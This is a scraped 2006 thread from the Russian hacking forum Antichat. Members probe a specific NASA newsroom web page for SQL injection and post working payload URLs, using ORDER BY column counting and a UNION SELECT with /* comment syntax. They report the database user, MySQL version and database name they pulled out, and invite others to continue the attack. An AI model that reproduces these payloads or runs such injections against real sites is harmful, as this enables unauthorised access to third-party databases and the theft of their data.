ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Smile! Ну, и, конечно, SQL-inject на NASA
  #1  
Старый 10.08.2006, 12:34
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


Smile Smile! Ну, и, конечно, SQL-inject на NASA

Интересная ссылка, меня сразу заинтриговала:
umbra.nascom.nasa.gov/eit/eit_guide/listings/anal.htm
Я, безусловно, понимаю, что anal - это еще и дотошный, суетливый, и тем не менее.

А вот SQL-inject. Обработать грамотно мне не хватило времени, прошу тех, кто возьмется - сообщить результаты.
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=679'+order+by+14--
P. S. order by здесь не при делах.

Последний раз редактировалось 1ten0.0net1; 10.08.2006 в 12:36..
 
Ответить с цитированием

  #2  
Старый 10.08.2006, 12:38
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

ордер бай в мускле ВСЕГДА при делах.
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'union+select+1,2,3,4,5,6,7/*
 
Ответить с цитированием

  #3  
Старый 10.08.2006, 12:45
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Я имел ввиду только то, что запрос с ORDER BY 14 не соответсвует реальному количеству столбцов \very SAD\.
 
Ответить с цитированием

  #4  
Старый 10.08.2006, 12:46
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

2 ZaCo - а каким методом ты выяснил, что там string параметр? Просто по-опыту?
 
Ответить с цитированием

  #5  
Старый 10.08.2006, 12:46
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

а при чем тут вообще 14? че ты мне гонишь. order by 7 последний. учитывая что это мусуль то это и есь последний тк на 8 ошибка.
---
строка потому что во-первых в это же место подставляется текст) во-вторых когда я пишу 'xa' то вижу xa

Последний раз редактировалось PinkPanther; 07.09.2006 в 20:19.. Причина: мат Зако, мат....((
 
Ответить с цитированием

  #6  
Старый 10.08.2006, 12:53
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Благодаря ZaCo выявил следующее:
USER() - web@localhost
VERSION - 4.0.14-standard
DATABASE() - eospso

2 ZaCO
Почему ничего не выдает, там же - MySQL!
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6 ,7%20from%20INFORMATION_SCHEMA.COLUMNS/*

И, что еще не понятнее - чем объясняется тот факт, что запрос с комментарием -- в конце не работает, а твой - пашет???
 
Ответить с цитированием

  #7  
Старый 10.08.2006, 12:55
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

хотя бы потому что там 4 ветка. -- работает до конца строки, /* до конца запроса
 
Ответить с цитированием

  #8  
Старый 10.08.2006, 12:58
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Цитата:
Сообщение от ZaCo  
а при чем тут вообще 14? Я наугад поставил цифру, чтобы не упрщать задачу другим, я это имел ввиду.
---
строка потому что во-первых в это же место подставляется текст) во-вторых когда я пишу 'xa' то вижу xa
А я пишу 'xa' в параметр и не вижу ничего!

Объясни, епожалуйста, если не лень, конечно про тип поподробнее.
 
Ответить с цитированием

  #9  
Старый 10.08.2006, 12:59
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

Цитата:
Сообщение от 1ten0.0net1  
2 ZaCO
Почему ничего не выдает, там же - MySQL!
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6 ,7%20from%20INFORMATION_SCHEMA.COLUMNS/*
Потому что INFORMATION_SCHEMA.COLUMNS в MSSQL.
 
Ответить с цитированием

  #10  
Старый 10.08.2006, 13:06
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

я електу поставил, но не за тупость) а за ошибочное мнение. в пятой ветке мускля information_schema является системной таблицей.
1ten0.0net1 перебором - пробуешь строку, если прокатило то там можно попробовать поставить строковую функцию.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ